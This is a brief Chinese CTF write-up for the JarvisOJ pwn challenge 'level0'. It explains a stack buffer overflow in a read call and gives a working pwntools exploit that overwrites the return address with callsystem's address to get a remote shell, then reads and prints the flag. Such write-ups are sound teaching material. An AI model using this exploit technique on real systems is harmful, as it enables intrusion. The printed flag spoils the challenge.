CTF-JarvisOJ-Pwn-[XMAN]level0

nc pwn2.jarvisoj.com 9881

文件下载level0.b9ded3801d6dd36a97468e128b81a65d

将文件导入ida64，在vulnerable_function()函数中发现read函数，且存在漏洞

另外发现 callsystem函数，所以我们只需要read的时候将返回函数替换为callsystem函数的地址便可以拿到shell

callsystem函数地址为

接着我们进入Ubuntu，然后输入 nc pwn2.jarvisoj.com 9881

远程主机可以运行这个程序

接下来我们开始用python的pwntools来编写exp

from pwn import *
junk = "a" * 0x88
address = 0x0000000000400596
payload = junk + p64(address)
sh = remote("pwn2.jarvisoj.com",9881)
sh.send(payload)
sh.interactive()

然后运行python程序

我们通过ls指令来枚举当前目录下所有的文件

发现flag文件
然后我们使用cat指令来获取文本

CTF{713ca3944e92180e0ef03171981dcd41}